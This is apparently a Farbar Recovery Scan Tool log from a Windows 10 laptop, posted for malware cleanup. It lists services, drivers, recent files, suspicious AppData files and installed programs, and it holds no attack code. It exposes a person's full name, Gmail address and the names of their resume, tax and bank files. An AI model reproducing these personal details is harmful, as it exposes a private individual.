S4 McciCMService64; C:\Program Files\Common Files\Motive\McciCMService.exe [517632 2010-11-08] (Alcatel-Lucent) [File not signed]
R2 MDM; C:\Program Files (x86)\Common Files\Microsoft Shared\VS7Debug\mdm.exe [270336 2001-02-23] (Microsoft Corporation) [File not signed]
R2 Micro Star SCM; C:\Program Files (x86)\System Control Manager\MSIService.exe [160768 2009-07-09] (Micro-Star International Co., Ltd.) [File not signed]
S4 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1720608 2014-07-25] (NVIDIA Corporation)
S4 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [18956064 2014-07-25] (NVIDIA Corporation)
R2 pgsql-8.3; C:\Program Files (x86)\PostgreSQL\8.3\bin\pg_ctl.exe [65536 2008-09-19] (PostgreSQL Global Development Group) [File not signed]
S4 RealNetworks Downloader Resolver Service; C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe [39056 2013-04-16] ()
S4 ss_conn_service; C:\Program Files\Samsung\USB Drivers\25_escape\conn\ss_conn_service.exe [745224 2015-07-08] (DEVGURU Co., LTD.)
S4 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [5436176 2015-02-09] (TeamViewer GmbH)
R2 tmInstall; C:\Program Files\Thrustmaster\FFB Racing wheel\drivers\amd64\tmInstall.EXE [50336 2015-09-15] (Thrustmaster®)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2015-07-10] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-07-10] (Microsoft Corporation)
 
===================== Drivers (Whitelisted) ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 AnyDVD; C:\Windows\System32\Drivers\AnyDVD.sys [125512 2010-12-01] (SlySoft, Inc.)
R3 AnyDVD; C:\Windows\SysWOW64\Drivers\AnyDVD.sys [125512 2010-12-01] (SlySoft, Inc.)
R3 ArcSoftKsUFilter; C:\Windows\System32\DRIVERS\ArcSoftKsUFilter.sys [19968 2009-05-26] (ArcSoft, Inc.)
S3 BthA2DP; C:\Windows\system32\drivers\BthA2DP.sys [165376 2015-07-09] (Microsoft Corporation)
S3 BthHFAud; C:\Windows\system32\DRIVERS\BthHfAud.sys [36864 2015-07-09] (Microsoft Corporation)
S3 EUCR; C:\Windows\System32\drivers\EUCR6SK.SYS [87888 2009-12-04] (ENE Technology Inc.)
S3 MREMP50; C:\Program Files (x86)\Common Files\Motive\MREMP50.sys [21248 2010-11-08] (Printing Communications Assoc., Inc. (PCAUSA)) [File not signed]
S3 MRESP50; C:\Program Files (x86)\Common Files\Motive\MRESP50.sys [20096 2010-11-08] (Printing Communications Assoc., Inc. (PCAUSA)) [File not signed]
S3 NTIOLib_1_0_4; C:\Program Files (x86)\msi\Live Update 5\NTIOLib_X64.sys [14136 2010-10-22] (MSI)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [20256 2014-07-25] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [40392 2014-03-31] (NVIDIA Corporation)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [587264 2015-06-17] (Realtek                                            )
S0 sptd; C:\Windows\System32\Drivers\sptd.sys [834544 2011-02-14] (Duplex Secure Ltd.)
S3 tmbulk; C:\Windows\System32\Drivers\tmbulk.sys [133280 2015-06-30] (© Guillemot R&D, 2015. All rights reserved.)
S3 tmhidusb; C:\Windows\system32\DRIVERS\tmhidusb.sys [170144 2015-09-15] (Thrustmaster)
S3 tmResetMin; C:\Windows\System32\Drivers\tmResetMin.sys [36000 2015-09-15] (© Guillemot R&D, 2013. All rights reserved.)
S3 UdeCx; C:\Windows\System32\drivers\udecx.sys [44032 2015-07-09] ()
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-07-10] (Microsoft Corporation)
R3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [291680 2015-07-10] (Microsoft Corporation)
R2 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [119648 2015-07-10] (Microsoft Corporation)
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-04-30 14:04 - 2016-04-30 14:04 - 00852798 _____ C:\Users\RoNiN\Downloads\SecurityCheck.exe
2016-04-30 13:18 - 2016-04-30 13:40 - 00000000 ____D C:\Users\RoNiN\Downloads\Ice Cube - The Predator
2016-04-30 13:15 - 2016-04-30 13:15 - 00016148 _____ C:\WINDOWS\system32\RONIN-LAPTOP_RoNiN_HistoryPrediction.bin
2016-04-30 12:58 - 2016-04-30 13:08 - 174238936 _____ C:\Users\RoNiN\Downloads\Ice Cube - The Predator.zip
2016-04-30 12:17 - 2016-04-30 12:42 - 00000000 ____D C:\Users\RoNiN\Downloads\Violent Femmes - We Can Do Anything
2016-04-26 18:17 - 2016-04-30 11:57 - 00000000 ____D C:\Users\RoNiN\Downloads\Santigold - Santogold
2016-04-26 18:17 - 2016-04-30 11:57 - 00000000 ____D C:\Users\RoNiN\Downloads\Santigold - 99 Cents
2016-04-26 18:10 - 2016-04-26 18:30 - 00000000 ____D C:\Users\RoNiN\Downloads\Santigold - Master Of My Make-Believe (Deluxe Edition)
2016-04-26 18:08 - 2016-04-26 18:15 - 00000000 ____D C:\Users\RoNiN\Downloads\Jesse Royal - In Comes The Small Axe
2016-04-21 18:40 - 2016-04-21 18:40 - 00028865 _____ C:\Users\RoNiN\Downloads\JPMC (7).QFX
2016-04-17 00:06 - 2016-04-17 00:07 - 73695845 _____ C:\Users\RoNiN\Downloads\Violent Femmes - We Can Do Anything.zip
2016-04-16 18:32 - 2016-04-16 18:32 - 00000020 ___SH C:\Users\DefaultAppPool\ntuser.ini
2016-04-16 18:32 - 2016-04-16 18:32 - 00000000 _SHDL C:\Users\DefaultAppPool\My Documents
2016-04-16 18:32 - 2016-04-16 18:32 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\My Videos
2016-04-16 18:32 - 2016-04-16 18:32 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\My Pictures
2016-04-16 18:32 - 2016-04-16 18:32 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\My Music
2016-04-16 18:32 - 2016-04-16 18:32 - 00000000 ____D C:\Users\DefaultAppPool
2016-04-16 18:32 - 2015-10-03 04:51 - 00000000 ____D C:\Users\DefaultAppPool\AppData\Roaming\Real
2016-04-16 18:32 - 2015-10-03 04:51 - 00000000 ____D C:\Users\DefaultAppPool\AppData\Roaming\Media Center Programs
2016-04-16 18:32 - 2015-10-03 04:51 - 00000000 ____D C:\Users\DefaultAppPool\AppData\Local\NVIDIA Corporation
2016-04-16 18:32 - 2015-10-03 04:51 - 00000000 ____D C:\Users\DefaultAppPool\AppData\Local\NVIDIA
2016-04-16 18:32 - 2015-10-03 04:51 - 00000000 ____D C:\Users\DefaultAppPool\AppData\Local\Google
2016-04-16 18:28 - 2016-04-16 18:28 - 00001153 _____ C:\Users\RoNiN\Desktop\PokerTracker 4.lnk
2016-04-16 18:25 - 2016-04-16 18:28 - 65753680 _____ C:\Users\RoNiN\Downloads\PT-Install-v4.14.13.exe
2016-04-16 17:27 - 2016-04-16 17:27 - 00000016 _____ C:\ProgramData\mntemp
2016-04-16 16:54 - 2016-04-16 16:55 - 00000000 ____D C:\Users\RoNiN\Downloads\Atmosphere - Southsiders (Deluxe Version)
2016-04-16 16:26 - 2016-04-16 16:39 - 187636022 _____ C:\Users\RoNiN\Downloads\Atmosphere - Southsiders (Deluxe Version).zip
2016-04-16 16:20 - 2016-04-16 16:23 - 00000000 ____D C:\Users\RoNiN\Downloads\Santana - Santana IV
2016-04-16 15:25 - 2016-04-16 15:37 - 181639222 _____ C:\Users\RoNiN\Downloads\Santana - Santana IV.zip
2016-04-16 13:51 - 2016-04-16 13:51 - 00001450 _____ C:\Users\RoNiN\Desktop\JRT.txt
2016-04-16 13:47 - 2016-04-16 13:47 - 01610352 _____ (Malwarebytes) C:\Users\RoNiN\Downloads\JRT.exe
2016-04-16 13:33 - 2016-04-16 13:34 - 03677760 _____ C:\Users\RoNiN\Downloads\adwcleaner_5.111.exe
2016-04-15 19:10 - 2016-04-15 19:10 - 00164396 _____ C:\Users\RoNiN\Desktop\TomDreiling2016Resume.pdf
2016-04-14 21:41 - 2016-04-14 21:41 - 01088288 _____ C:\Users\RoNiN\Downloads\TaxDocument (2).pdf
2016-04-14 21:41 - 2016-04-14 21:41 - 00160537 _____ C:\Users\RoNiN\Downloads\TaxDocument.pdf
2016-04-14 21:37 - 2016-04-14 21:37 - 01088280 _____ C:\Users\RoNiN\Downloads\TaxDocument (1).pdf
2016-04-14 19:07 - 2016-04-16 13:32 - 00000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2016-04-14 19:07 - 2016-04-16 12:08 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2016-04-14 19:05 - 2016-04-16 13:32 - 00000000 ____D C:\Users\RoNiN\Desktop\mbar
2016-04-14 19:05 - 2016-04-16 12:07 - 00109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2016-04-14 18:56 - 2016-04-14 19:05 - 16563352 _____ (Malwarebytes Corp.) C:\Users\RoNiN\Downloads\mbar-1.09.3.1001.exe
2016-04-14 18:55 - 2016-04-14 18:55 - 00159486 _____ C:\Users\RoNiN\Downloads\TomDreiling2015Resume (1).pdf
2016-04-10 19:08 - 2016-04-10 19:14 - 98655550 _____ C:\Users\RoNiN\Downloads\ECOMM - Brian Laney - Alert Technologies.pdf
2016-04-09 10:36 - 2016-04-09 10:36 - 00002547 _____ C:\Users\Public\Desktop\TurboTax 2015.lnk
2016-04-09 10:36 - 2016-04-09 10:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TurboTax 2015
2016-04-09 01:20 - 2016-04-09 01:22 - 00000000 ____D C:\Users\RoNiN\Downloads\Cypress Hill - Cypress X Rusko EP (With Rusko)
2016-04-09 00:24 - 2016-04-09 00:31 - 39492246 _____ C:\Users\RoNiN\Downloads\Cypress Hill - Cypress X Rusko EP (With Rusko).zip
2016-04-09 00:02 - 2016-04-09 00:15 - 00000000 ____D C:\Users\RoNiN\Downloads\Weezer - Weezer (White Album)
2016-04-09 00:02 - 2016-04-09 00:12 - 00000000 ____D C:\Users\RoNiN\Downloads\A Tribe Called Quest - The Best Of
2016-04-08 23:28 - 2016-04-08 23:28 - 03119168 _____ C:\Users\RoNiN\Downloads\AdwCleaner.exe
2016-04-08 10:20 - 2001-08-23 13:00 - 00034871 _____ C:\WINDOWS\system32\gpedit.msc
2016-04-08 09:56 - 2016-04-08 09:56 - 00707354 _____ C:\WINDOWS\unins000.exe
2016-04-08 09:56 - 2016-04-08 09:56 - 00001535 _____ C:\WINDOWS\unins000.dat
2016-04-08 09:56 - 2016-04-08 09:56 - 00000000 ____D C:\WINDOWS\SysWOW64\GPBAK
2016-04-08 09:56 - 2008-04-14 02:11 - 00295936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\appmgr.dll
2016-04-08 09:56 - 2001-08-23 13:00 - 00034871 _____ C:\WINDOWS\SysWOW64\gpedit.msc
2016-04-07 20:55 - 2016-04-30 14:03 - 00000000 ____D C:\FRST
2016-04-07 18:06 - 2016-04-07 18:08 - 00271216 _____ C:\TDSSKiller.3.1.0.9_07.04.2016_18.06.48_log.txt
2016-04-07 16:15 - 2016-04-16 13:35 - 00000000 ____D C:\AdwCleaner
2016-04-07 15:48 - 2016-04-07 15:48 - 00000490 _____ C:\TDSSKiller.3.1.0.9_07.04.2016_15.48.47_log.txt
2016-04-07 15:05 - 2016-04-07 15:08 - 00270622 _____ C:\TDSSKiller.3.1.0.9_07.04.2016_15.05.40_log.txt
2016-04-05 13:10 - 2016-04-16 13:32 - 00000000 ____D C:\virus
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-04-30 14:03 - 2011-02-19 00:22 - 00000932 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-04-30 13:52 - 2015-07-30 18:42 - 00000000 ___HD C:\Program Files\WindowsApps
2016-04-30 13:52 - 2015-07-30 18:42 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-04-30 13:40 - 2010-10-17 17:13 - 00000000 ____D C:\Program Files (x86)\The GodFather
2016-04-30 13:10 - 2014-05-10 00:37 - 00000934 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001UA.job
2016-04-30 13:07 - 2014-05-26 01:05 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-04-30 11:37 - 2015-10-03 04:40 - 00000000 ____D C:\Users\RoNiN
2016-04-30 11:37 - 2011-02-19 00:22 - 00000928 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-04-30 11:36 - 2015-07-30 17:52 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-04-28 18:25 - 2015-12-18 20:59 - 00139925 _____ C:\Users\RoNiN\Downloads\tom.dreiling@gmail.com.ical 2016-04-29.zip
2016-04-26 18:49 - 2016-03-22 21:01 - 00000000 ____D C:\Users\postgres
2016-04-21 16:10 - 2014-05-10 00:37 - 00000882 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001Core.job
2016-04-20 08:00 - 2015-07-10 05:05 - 00524288 ___SH C:\WINDOWS\system32\config\BBI
2016-04-18 18:12 - 2010-10-17 21:14 - 00565248 _____ C:\Users\RoNiN\Desktop\Info.mdb
2016-04-16 20:31 - 2015-03-01 21:13 - 00000000 ____D C:\Users\RoNiN\Documents\888PokerNJ
2016-04-16 18:29 - 2015-03-01 22:07 - 00000000 ____D C:\Program Files (x86)\PokerTracker 4
2016-04-16 18:29 - 2015-03-01 21:31 - 00000000 ____D C:\Users\RoNiN\AppData\Local\PokerTracker 4
2016-04-16 16:28 - 2014-12-14 18:28 - 00000000 ____D C:\Users\RoNiN\Desktop\Pics
2016-04-14 19:08 - 2016-03-13 14:29 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-04-14 18:36 - 2015-07-30 18:40 - 00000000 ____D C:\WINDOWS\INF
2016-04-13 20:23 - 2011-08-23 00:51 - 00000000 ____D C:\Users\RoNiN\AppData\LocalLow\Temp
2016-04-13 20:21 - 2015-07-30 18:42 - 00000000 ____D C:\WINDOWS\SysWOW64\GroupPolicy
2016-04-12 17:52 - 2015-10-03 08:42 - 00000000 ____D C:\Users\RoNiN\AppData\Local\Packages
2016-04-11 19:17 - 2016-03-23 23:06 - 00002282 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-04-11 19:17 - 2016-03-23 23:06 - 00002270 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-04-09 18:44 - 2016-03-22 21:58 - 00000000 ____D C:\Program Files\Emsisoft Anti-Malware
2016-04-09 18:40 - 2014-01-05 20:04 - 00000000 ____D C:\Users\RoNiN\Desktop\XBOX1
2016-04-09 16:28 - 2015-10-03 04:36 - 00006876 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-04-09 14:33 - 2016-03-13 14:29 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-04-09 12:44 - 2010-10-17 10:09 - 00000000 ____D C:\Users\RoNiN\Documents\Text Documents
2016-04-09 11:12 - 2010-10-16 20:42 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\Intuit
2016-04-09 10:39 - 2012-02-07 03:14 - 00001545 _____ C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
2016-04-09 10:33 - 2011-02-15 01:43 - 00000000 ____D C:\Program Files (x86)\TurboTax
2016-04-09 00:04 - 2011-02-19 00:22 - 00000000 ____D C:\Program Files (x86)\Google
2016-04-08 15:53 - 2009-07-13 23:20 - 00000000 ___HD C:\WINDOWS\system32\GroupPolicy
2016-04-08 13:45 - 2015-07-30 18:42 - 00000000 ____D C:\WINDOWS\system32\NDF
2016-04-08 13:17 - 2016-03-22 08:01 - 00003650 _____ C:\WINDOWS\System32\Tasks\CreateExplorerShellUnelevatedTask
2016-04-07 16:20 - 2011-07-10 23:21 - 00000000 ____D C:\Users\RoNiN\AppData\LocalLow\Yahoo!
2016-04-07 14:52 - 2013-11-10 15:02 - 04126550 _____ C:\WINDOWS\ntbtlog.txt
2016-04-07 14:36 - 2015-07-30 18:42 - 00000000 ___SD C:\WINDOWS\Downloaded Program Files
 
==================== Files in the root of some directories =======
 
2016-03-11 19:39 - 2016-03-11 19:39 - 7600640 _____ () C:\Users\RoNiN\AppData\Roaming\agent.dat
2014-02-13 05:53 - 2014-02-13 05:53 - 0000268 ___RH () C:\Users\RoNiN\AppData\Roaming\Ambient
2014-02-13 05:54 - 2014-02-13 05:54 - 0000268 ___RH () C:\Users\RoNiN\AppData\Roaming\Analog Mono
2014-02-13 05:53 - 2014-02-13 05:53 - 0000268 ___RH () C:\Users\RoNiN\AppData\Roaming\Analog Pad
2015-10-29 09:35 - 2015-10-29 09:35 - 0000093 _____ () C:\Users\RoNiN\AppData\Roaming\ARCompanion.log
2016-03-11 19:38 - 2016-03-11 19:38 - 0072729 _____ () C:\Users\RoNiN\AppData\Roaming\Dripsoling.tst
2015-04-19 08:20 - 2015-04-19 08:20 - 0005872 _____ () C:\Users\RoNiN\AppData\Roaming\GWB6hPAk0e6t
2016-03-11 19:32 - 2016-03-11 19:32 - 0127488 _____ () C:\Users\RoNiN\AppData\Roaming\Installer.dat
2016-03-11 19:39 - 2016-03-11 19:39 - 0018432 _____ () C:\Users\RoNiN\AppData\Roaming\Main.dat
2016-03-11 19:39 - 2016-03-11 19:39 - 1786944 _____ () C:\Users\RoNiN\AppData\Roaming\Silflex.tst
2016-03-21 19:35 - 2016-03-21 19:35 - 0000046 _____ () C:\Users\RoNiN\AppData\Roaming\WB.CFG
2011-03-09 00:31 - 2012-12-28 02:36 - 0004608 _____ () C:\Users\RoNiN\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2011-09-04 17:15 - 2011-09-04 18:54 - 0044224 _____ () C:\Users\RoNiN\AppData\Local\RAContactHistory.xml
2014-01-13 08:41 - 2015-05-10 15:55 - 0007599 _____ () C:\Users\RoNiN\AppData\Local\Resmon.ResmonCfg
2016-03-09 18:03 - 2016-03-09 18:03 - 0002560 _____ () C:\Users\RoNiN\AppData\Local\uninstall.exe
2012-11-05 05:50 - 2012-11-05 05:50 - 0000026 ____H () C:\ProgramData\.811261211181235583101118113995
2010-12-13 23:04 - 2011-03-23 01:59 - 0000083 ___SH () C:\ProgramData\.zreglib
2012-05-27 21:35 - 2012-05-27 21:35 - 0000057 _____ () C:\ProgramData\Ament.ini
2014-02-13 05:53 - 2014-02-13 05:53 - 0000268 ___RH () C:\ProgramData\Analog Sync
2014-02-13 05:54 - 2014-02-13 05:54 - 0000268 ___RH () C:\ProgramData\Animals
2014-02-13 05:53 - 2014-02-13 05:53 - 0000268 ___RH () C:\ProgramData\Applause and Laugher
2010-10-17 21:03 - 2010-10-17 21:03 - 0004998 _____ () C:\ProgramData\bltofzsb.qlf
2015-03-01 21:31 - 2015-03-01 21:31 - 0004939 _____ () C:\ProgramData\flwjycbm.bab
2012-02-07 03:14 - 2016-04-09 10:39 - 0001545 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
2016-04-16 17:27 - 2016-04-16 17:27 - 0000016 _____ () C:\ProgramData\mntemp
2014-02-13 05:54 - 2014-02-13 05:54 - 0000020 ____H () C:\ProgramData\PKP_DLes.DAT
2014-02-13 05:53 - 2015-06-25 13:12 - 0000020 ____H () C:\ProgramData\PKP_DLet.DAT
2014-02-13 05:53 - 2015-09-27 23:45 - 0000020 ____H () C:\ProgramData\PKP_DLev.DAT
 
Some files in TEMP:
====================
C:\Users\RoNiN\AppData\Local\Temp\libeay32.dll
C:\Users\RoNiN\AppData\Local\Temp\msvcr120.dll
C:\Users\RoNiN\AppData\Local\Temp\setup.exe
C:\Users\RoNiN\AppData\Local\Temp\sqlite3.dll
 
 
==================== Bamital & volsnap =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2016-04-28 18:01
 
==================== End of FRST.txt ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
Ran by RoNiN (2016-04-30 14:05:29)
Running from C:\virus
Windows 10 Home (X64) (2015-10-03 12:41:30)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-470165136-1162808608-978993673-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-470165136-1162808608-978993673-503 - Limited - Disabled)
Guest (S-1-5-21-470165136-1162808608-978993673-501 - Limited - Disabled)
Mcx1-RONIN-LAPTOP (S-1-5-21-470165136-1162808608-978993673-1013 - Limited - Enabled)
postgres (S-1-5-21-470165136-1162808608-978993673-1005 - Limited - Enabled) => C:\Users\postgres
RoNiN (S-1-5-21-470165136-1162808608-978993673-1001 - Administrator - Enabled) => C:\Users\RoNiN
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
888pokerNJ (HKLM-x32\...\888pokerNJ) (Version:  - )
abgx360 v1.0.6 (HKLM-x32\...\abgx360) (Version:  - )
AC3Filter (remove only) (HKLM-x32\...\AC3Filter) (Version:  - )
Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.0.7220 - Adobe Systems Inc.)
Adobe Flash Player 10 ActiveX 64-bit (HKLM\...\Adobe Flash Player ActiveX 64) (Version: 10.2.161.23 - Adobe Systems Incorporated)
Adobe Flash Player 16 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 16.0.0.305 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.02) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.02 - Adobe Systems Incorporated)
Amazon Music (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Amazon Amazon Music) (Version: 3.1.0.570 - Amazon Services LLC)
AnswerWorks 5.0 English Runtime (HKLM-x32\...\{DBCC73BA-C69A-4BF5-B4BF-F07501EE7039}) (Version: 5.0.7 - Vantage Software Technologies)
AnyDVD (HKLM-x32\...\AnyDVD) (Version: 6.7.8.0 - SlySoft)
Apple Application Support (HKLM-x32\...\{83CAF0DE-8D3B-4C37-A631-2B8F16EC3031}) (Version: 3.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{BDD99690-3541-4619-9D2A-3CDDB3E15F9E}) (Version: 8.0.5.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ArcSoft Magic-i Visual Effects 2 (HKLM-x32\...\{8E90189A-A5D4-4C0E-A908-06C4236F98EE}) (Version: 2.0.10.94 - ArcSoft)
ArcSoft Print Creations - Album Page (HKLM-x32\...\{E6B4117F-AC59-4B13-9274-EB136E8897EE}) (Version:  - ArcSoft)
ArcSoft Print Creations - Brochures & Flyers (HKLM-x32\...\{01A1A019-E1D8-482A-BE17-5E118D17C0A0}) (Version:  - ArcSoft)
ArcSoft Print Creations - Funhouse (HKLM-x32\...\{9591C049-5CAE-4E89-A8D9-191F1899628B}) (Version:  - ArcSoft)
ArcSoft Print Creations - Funhouse II (HKLM-x32\...\{3CE47E6B-AE27-4E40-AC54-329EED96B933}) (Version:  - ArcSoft)
ArcSoft Print Creations - Greeting Card (HKLM-x32\...\{F04F9557-81A9-4293-BC49-2C216FA325A7}) (Version:  - ArcSoft)
ArcSoft Print Creations - Photo Book (HKLM-x32\...\{56589DFE-0C29-4DFE-8E42-887B771ECD23}) (Version:  - ArcSoft)
ArcSoft Print Creations - Photo Calendar (HKLM-x32\...\{CA9ED5E4-1548-485B-A293-417840060158}) (Version:  - ArcSoft)
ArcSoft Print Creations - Photo Prints (HKLM-x32\...\{95F875CC-1B85-43E6-B3E0-13EA04F3D995}) (Version:  - ArcSoft)
ArcSoft Print Creations - Poster Creator (HKLM-x32\...\{5D1C82E7-7EC0-4404-A8AD-36C3B444BC34}) (Version:  - ArcSoft)
ArcSoft Print Creations - Scrapbook (HKLM-x32\...\{B0D83FCD-9D42-43ED-8315-250326AADA02}) (Version:  - ArcSoft)
ArcSoft Print Creations - Slimline Card (HKLM-x32\...\{007B37D9-0C45-4202-834B-DD5FAAE99D63}) (Version:  - ArcSoft)
ArcSoft Print Creations (HKLM-x32\...\{A3324BBB-3A83-40CE-AA8C-759D849B7EA1}) (Version: 3.0.255.487 - ArcSoft)
ArcSoft WebCam Companion 3 (HKLM-x32\...\{25478065-4CB1-448C-80E4-8C4529017EE3}) (Version: 3.0.32.354 - ArcSoft)
Avidemux 2.6 - 64 bits (HKLM-x32\...\Avidemux 2.6 - 64 bits (64-bit)) (Version: 2.6.10.150607 - )
AviSynth 2.5 (HKLM-x32\...\AviSynth) (Version:  - )
Battlelog Web Plugins (HKLM-x32\...\Battlelog Web Plugins) (Version: 2.6.2 - EA Digital Illusions CE AB)
BitTorrent (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\BitTorrent) (Version: 7.9.2.38398 - BitTorrent Inc.)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
BovadaPoker (HKLM-x32\...\{D7CA2DF8-95CE-4C80-9296-98E21219A1E5}}_is1) (Version:   -  )
BurnRecovery (HKLM-x32\...\{2892E1B7-E24D-4CCB-B8A7-B63D4B66F89F}) (Version: 3.0.912.401 - Micro-Star International Co., Ltd.)
Canon MX870 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MX870_series) (Version:  - )
Chrome Remote Desktop Host (HKLM-x32\...\{C230A275-D2A0-446B-ACE5-06BF067D50F2}) (Version: 50.0.2661.22 - Google Inc.)
ChromecastApp (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\{079ede36-133d-44b0-8053-c7c1fa8d2e0d}_is1) (Version: 1.5.1693.0 - Google Inc.)
Citrix Receiver (HKLM-x32\...\CitrixOnlinePluginPackWeb) (Version: 14.2.100.14 - Citrix Systems, Inc.)
DIRECTV Player (HKLM-x32\...\{dbaba6a3-366e-43a7-8f4e-b0a868c06ab3}) (Version: 10.0 - DIRECTV)
DIRECTV2PC Playback Advisor (HKLM-x32\...\InstallShield_{479F8C12-576B-4A58-AB78-4B70F7012AA8}) (Version: 1.0 - CyberLink Corp.)
DIRECTV2PC Playback Advisor (x32 Version: 1.0 - CyberLink Corp.) Hidden
DIRECTV2PC™ (HKLM-x32\...\InstallShield_{E9B10AA5-E5F6-4DEF-A435-FB20704AF1E8}) (Version: 2.0.7507 - CyberLink Corp.)
DIRECTV2PC™ (x32 Version: 2.0.7507 - CyberLink Corp.) Hidden
Doyles Room (HKLM-x32\...\78315C9D-B2DA-4430-B077-1BDA99CCB43D) (Version: 9.4 - IGSoft)
Ear Force Audio Hub (HKLM-x32\...\{64D69874-302B-4E2C-B18C-D79667822110}) (Version: 6.6.2.0 - Turtle Beach)
ELAN Touchpad 15.9.6.1_X64_WHQL (HKLM\...\Elantech) (Version: 15.9.6.1 - ELAN Microelectronic Corp.)
FairStars CD Ripper 1.90 (HKLM-x32\...\FairStars CD Ripper_is1) (Version:  - FairStars Soft)
FFB Racing Wheel drivers (HKLM-x32\...\{28B758EA-5C83-48B1-B352-C70F12C73F5A}) (Version: 2.TTRS.2015 - Thrustmaster)
Final Draft (HKLM-x32\...\{7C3C895B-AE02-4F30-8A6A-051D37A38DD0}) (Version: 8.0.1.89 - Final Draft, Inc.)
Firebird SQL Server - MAGIX Edition (HKLM-x32\...\{34EB6245-C8D0-4D8A-B8D8-EEBFF7A91485}) (Version: 2.1.27.0 - MAGIX AG)
